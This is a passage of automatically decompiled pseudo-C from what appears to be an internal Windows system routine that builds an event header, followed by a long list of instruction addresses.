					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x31b60e8;
								if( *0x31b60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x31b60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E03109710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E03106DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0310F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0310F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0310F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0310FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0310FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0310F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0310F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E03194CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0311D130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                                                    0x03195ba5
                                                                                                                                                    0x03195baa
                                                                                                                                                    0x03195baf
                                                                                                                                                    0x03195bb4
                                                                                                                                                    0x03195bb6
                                                                                                                                                    0x03195bbc
                                                                                                                                                    0x03195bbe
                                                                                                                                                    0x03195bc4
                                                                                                                                                    0x03195bcd
                                                                                                                                                    0x03195bd3
                                                                                                                                                    0x03195bd6
                                                                                                                                                    0x03195bdc
                                                                                                                                                    0x03195be0
                                                                                                                                                    0x03195be3
                                                                                                                                                    0x03195beb
                                                                                                                                                    0x03195bf2
                                                                                                                                                    0x03195bf8
                                                                                                                                                    0x03195bfe
                                                                                                                                                    0x03195c04
                                                                                                                                                    0x03195c0e
                                                                                                                                                    0x03195c18
                                                                                                                                                    0x03195c1f
                                                                                                                                                    0x03195c25
                                                                                                                                                    0x03195c2a
                                                                                                                                                    0x03195c2c
                                                                                                                                                    0x03195c32
                                                                                                                                                    0x03195c3a
                                                                                                                                                    0x03195c3f
                                                                                                                                                    0x03195c42
                                                                                                                                                    0x03195c48
                                                                                                                                                    0x03195c5b
                                                                                                                                                    0x03195c5b
                                                                                                                                                    0x03195c2c
                                                                                                                                                    0x03195cb7
                                                                                                                                                    0x03195cb9
                                                                                                                                                    0x03195cbf
                                                                                                                                                    0x03195cc2
                                                                                                                                                    0x03195cca
                                                                                                                                                    0x03195ccb
                                                                                                                                                    0x03195ccb
                                                                                                                                                    0x03195cd1
                                                                                                                                                    0x03195cd7
                                                                                                                                                    0x03195cda
                                                                                                                                                    0x03195ce1
                                                                                                                                                    0x03195ce4
                                                                                                                                                    0x03195ce7
                                                                                                                                                    0x03195ced
                                                                                                                                                    0x03195cf3
                                                                                                                                                    0x03195cf9
                                                                                                                                                    0x03195cff
                                                                                                                                                    0x03195d08
                                                                                                                                                    0x03195d0a
                                                                                                                                                    0x03195d0e
                                                                                                                                                    0x03195d10
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195d16
                                                                                                                                                    0x03195d1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195d20
                                                                                                                                                    0x03195d22
                                                                                                                                                    0x03195d25
                                                                                                                                                    0x03195d2f
                                                                                                                                                    0x03195d2f
                                                                                                                                                    0x03195d33
                                                                                                                                                    0x03195d3d
                                                                                                                                                    0x03195d49
                                                                                                                                                    0x03195d4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195d5a
                                                                                                                                                    0x03195d5d
                                                                                                                                                    0x03195d60
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195d66
                                                                                                                                                    0x03195d69
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195d6f
                                                                                                                                                    0x03195d6f
                                                                                                                                                    0x03195d73
                                                                                                                                                    0x03195d79
                                                                                                                                                    0x03195d7f
                                                                                                                                                    0x03195d86
                                                                                                                                                    0x03195d95
                                                                                                                                                    0x03195d98
                                                                                                                                                    0x03195dba
                                                                                                                                                    0x03195dcb
                                                                                                                                                    0x03195dce
                                                                                                                                                    0x03195dd3
                                                                                                                                                    0x03195dd6
                                                                                                                                                    0x03195dd8
                                                                                                                                                    0x03195de6
                                                                                                                                                    0x03195dec
                                                                                                                                                    0x03195dee
                                                                                                                                                    0x03195df1
                                                                                                                                                    0x03195df3
                                                                                                                                                    0x0319635a
                                                                                                                                                    0x0319635a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0319635a
                                                                                                                                                    0x03195dfe
                                                                                                                                                    0x03195e02
                                                                                                                                                    0x03195e05
                                                                                                                                                    0x03195e07
                                                                                                                                                    0x03195e10
                                                                                                                                                    0x03195e13
                                                                                                                                                    0x03195e1b
                                                                                                                                                    0x03195e1c
                                                                                                                                                    0x03195e21
                                                                                                                                                    0x03195e22
                                                                                                                                                    0x03195e23
                                                                                                                                                    0x03195e25
                                                                                                                                                    0x03195e2a
                                                                                                                                                    0x03195e2c
                                                                                                                                                    0x03195e2e
                                                                                                                                                    0x03195e36
                                                                                                                                                    0x03195e39
                                                                                                                                                    0x03195e42
                                                                                                                                                    0x03195e47
                                                                                                                                                    0x03195e4d
                                                                                                                                                    0x03195e54
                                                                                                                                                    0x03195e54
                                                                                                                                                    0x03195e54
                                                                                                                                                    0x03195e2e
                                                                                                                                                    0x03195e5c
                                                                                                                                                    0x03195e5f
                                                                                                                                                    0x03195e62
                                                                                                                                                    0x03195e64
                                                                                                                                                    0x03195e6b
                                                                                                                                                    0x03195e70
                                                                                                                                                    0x03195e7a
                                                                                                                                                    0x03195e7a
                                                                                                                                                    0x03195e7a
                                                                                                                                                    0x03195e6b
                                                                                                                                                    0x03195e7e
                                                                                                                                                    0x03195e7f
                                                                                                                                                    0x03195e7f
                                                                                                                                                    0x03195e81
                                                                                                                                                    0x03195e87
                                                                                                                                                    0x03195e8b
                                                                                                                                                    0x03195e8c
                                                                                                                                                    0x03195e8c
                                                                                                                                                    0x03195e8c
                                                                                                                                                    0x03195e9a
                                                                                                                                                    0x03195e9c
                                                                                                                                                    0x03195ea2
                                                                                                                                                    0x03195ea6
                                                                                                                                                    0x03195f50
                                                                                                                                                    0x03195f50
                                                                                                                                                    0x03195f57
                                                                                                                                                    0x03195f66
                                                                                                                                                    0x03195f66
                                                                                                                                                    0x03195f66
                                                                                                                                                    0x03195f68
                                                                                                                                                    0x03195f6a
                                                                                                                                                    0x031963d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03195f70
                                                                                                                                                    0x03195f70
                                                                                                                                                    0x03195f91
                                                                                                                                                    0x03195f9c
                                                                                                                                                    0x03195f9e
                                                                                                                                                    0x03195fa4
                                                                                                                                                    0x03195fa6
                                                                                                                                                    0x0319638c
                                                                                                                                                    0x03196392
                                                                                                                                                    0x031963a1
                                                                                                                                                    0x031963a7
                                                                                                                                                    0x031963af
                                                                                                                                                    0x031963af
                                                                                                                                                    0x031963bd
                                                                                                                                                    0x031963d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031963d8
                                                                                                                                                    0x03195fac
                                                                                                                                                    0x03195fb2
                                                                                                                                                    0x03195fb4
                                                                                                                                                    0x03195fbd
                                                                                                                                                    0x03195fc6
                                                                                                                                                    0x03195fce
                                                                                                                                                    0x03195fd4
                                                                                                                                                    0x03195fdc
                                                                                                                                                    0x03195fec
                                                                                                                                                    0x03195fed
                                                                                                                                                    0x03195fee
                                                                                                                                                    0x03195fef
                                                                                                                                                    0x03195ff9
                                                                                                                                                    0x03195ffa
                                                                                                                                                    0x03195ffb
                                                                                                                                                    0x03195ffc
                                                                                                                                                    0x03196000
                                                                                                                                                    0x03196004
                                                                                                                                                    0x03196012
                                                                                                                                                    0x03196012
                                                                                                                                                    0x03196018
                                                                                                                                                    0x03196019
                                                                                                                                                    0x0319601a
                                                                                                                                                    0x0319601b
                                                                                                                                                    0x0319601c
                                                                                                                                                    0x03196020
                                                                                                                                                    0x03196059
                                                                                                                                                    0x0319605c
                                                                                                                                                    0x03196061
                                                                                                                                                    0x03196061
                                                                                                                                                    0x03196022
                                                                                                                                                    0x03196022
                                                                                                                                                    0x03196022
                                                                                                                                                    0x03196025
                                                                                                                                                    0x0319602a
                                                                                                                                                    0x0319602b
                                                                                                                                                    0x03196031
                                                                                                                                                    0x03196037
                                                                                                                                                    0x03196038
                                                                                                                                                    0x0319603e
                                                                                                                                                    0x03196048
                                                                                                                                                    0x03196049
                                                                                                                                                    0x0319604a
                                                                                                                                                    0x0319604b
                                                                                                                                                    0x0319604c
                                                                                                                                                    0x0319604d
                                                                                                                                                    0x03196053
                                                                                                                                                    0x03196054
                                                                                                                                                    0x03196054
                                                                                                                                                    0x03196062
                                                                                                                                                    0x03196065
                                                                                                                                                    0x03196067
                                                                                                                                                    0x0319606a
                                                                                                                                                    0x03196070
                                                                                                                                                    0x03196075
                                                                                                                                                    0x03196076
                                                                                                                                                    0x03196081
                                                                                                                                                    0x03196087
                                                                                                                                                    0x03196095
                                                                                                                                                    0x03196099
                                                                                                                                                    0x0319609e
                                                                                                                                                    0x031960a4
                                                                                                                                                    0x031960ae
                                                                                                                                                    0x031960b0
                                                                                                                                                    0x031960b3
                                                                                                                                                    0x031960b6
                                                                                                                                                    0x031960b8
                                                                                                                                                    0x031960ba
                                                                                                                                                    0x031960ba
                                                                                                                                                    0x031960ba
                                                                                                                                                    0x031960ba
                                                                                                                                                    0x031960be
                                                                                                                                                    0x031960c0
                                                                                                                                                    0x031960c5
                                                                                                                                                    0x031960c5
                                                                                                                                                    0x031960c5
                                                                                                                                                    0x031960c6
                                                                                                                                                    0x031960cd
                                                                                                                                                    0x03196114
                                                                                                                                                    0x031960cf
                                                                                                                                                    0x031960cf
                                                                                                                                                    0x031960d4
                                                                                                                                                    0x031960d5
                                                                                                                                                    0x031960da
                                                                                                                                                    0x031960db
                                                                                                                                                    0x031960e1
                                                                                                                                                    0x031960e2
                                                                                                                                                    0x031960e8
                                                                                                                                                    0x031960f8
                                                                                                                                                    0x031960fd
                                                                                                                                                    0x031960fe
                                                                                                                                                    0x03196102
                                                                                                                                                    0x03196104
                                                                                                                                                    0x03196107
                                                                                                                                                    0x03196109
                                                                                                                                                    0x0319610b
                                                                                                                                                    0x0319610b
                                                                                                                                                    0x0319610b
                                                                                                                                                    0x0319610b
                                                                                                                                                    0x0319610f
                                                                                                                                                    0x0319610f
                                                                                                                                                    0x03196117
                                                                                                                                                    0x0319611a
                                                                                                                                                    0x0319611f
                                                                                                                                                    0x03196125
                                                                                                                                                    0x03196134
                                                                                                                                                    0x03196139
                                                                                                                                                    0x0319613f
                                                                                                                                                    0x03196146
                                                                                                                                                    0x03196148
                                                                                                                                                    0x0319614b
                                                                                                                                                    0x0319614d
                                                                                                                                                    0x0319614f
                                                                                                                                                    0x0319614f
                                                                                                                                                    0x0319614f
                                                                                                                                                    0x0319614f
                                                                                                                                                    0x03196153
                                                                                                                                                    0x03196159
                                                                                                                                                    0x03196159
                                                                                                                                                    0x0319615c
                                                                                                                                                    0x03196163
                                                                                                                                                    0x03196169
                                                                                                                                                    0x0319616c
                                                                                                                                                    0x03196172
                                                                                                                                                    0x03196181
                                                                                                                                                    0x03196186
                                                                                                                                                    0x03196187
                                                                                                                                                    0x0319618b
                                                                                                                                                    0x03196191
                                                                                                                                                    0x03196195
                                                                                                                                                    0x031961a3
                                                                                                                                                    0x031961bb
                                                                                                                                                    0x031961c0
                                                                                                                                                    0x031961c3
                                                                                                                                                    0x031961cc
                                                                                                                                                    0x031961d0
                                                                                                                                                    0x031961dc
                                                                                                                                                    0x031961de
                                                                                                                                                    0x031961e1
                                                                                                                                                    0x031961e4
                                                                                                                                                    0x031961e6
                                                                                                                                                    0x031961e8
                                                                                                                                                    0x031961e8
                                                                                                                                                    0x031961e8
                                                                                                                                                    0x031961e8
                                                                                                                                                    0x031961e6
                                                                                                                                                    0x031961ec
                                                                                                                                                    0x031961f3
                                                                                                                                                    0x03196203
                                                                                                                                                    0x03196209
                                                                                                                                                    0x0319620a
                                                                                                                                                    0x03196216
                                                                                                                                                    0x0319621d
                                                                                                                                                    0x03196227
                                                                                                                                                    0x03196241
                                                                                                                                                    0x03196246
                                                                                                                                                    0x0319624c
                                                                                                                                                    0x03196257
                                                                                                                                                    0x03196259
                                                                                                                                                    0x0319625c
                                                                                                                                                    0x0319625e
                                                                                                                                                    0x03196260
                                                                                                                                                    0x03196260
                                                                                                                                                    0x03196260
                                                                                                                                                    0x03196260
                                                                                                                                                    0x0319625e
                                                                                                                                                    0x03196264
                                                                                                                                                    0x03196267
                                                                                                                                                    0x03196269
                                                                                                                                                    0x03196315
                                                                                                                                                    0x03196315
                                                                                                                                                    0x0319631b
                                                                                                                                                    0x0319631e
                                                                                                                                                    0x03196324
                                                                                                                                                    0x03196327
                                                                                                                                                    0x0319632f
                                                                                                                                                    0x03196330
                                                                                                                                                    0x03196333
                                                                                                                                                    0x0319633a
                                                                                                                                                    0x0319633c
                                                                                                                                                    0x03196335
                                                                                                                                                    0x03196335
                                                                                                                                                    0x03196335
                                                                                                                                                    0x0319633f
                                                                                                                                                    0x03196342
                                                                                                                                                    0x0319634c
                                                                                                                                                    0x03196352
                                                                                                                                                    0x03196355
                                                                                                                                                    0x03196355
                                                                                                                                                    0x03196359
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0319626f
                                                                                                                                                    0x03196275
                                                                                                                                                    0x03196275
                                                                                                                                                    0x03196278
                                                                                                                                                    0x0319627e
                                                                                                                                                    0x0319627e
                                                                                                                                                    0x03196281
                                                                                                                                                    0x03196287
                                                                                                                                                    0x0319628d
                                                                                                                                                    0x03196298
                                                                                                                                                    0x0319629c
                                                                                                                                                    0x031962a2
                                                                                                                                                    0x0319629e
                                                                                                                                                    0x0319629e
                                                                                                                                                    0x0319629e
                                                                                                                                                    0x031962a7
                                                                                                                                                    0x031962a7
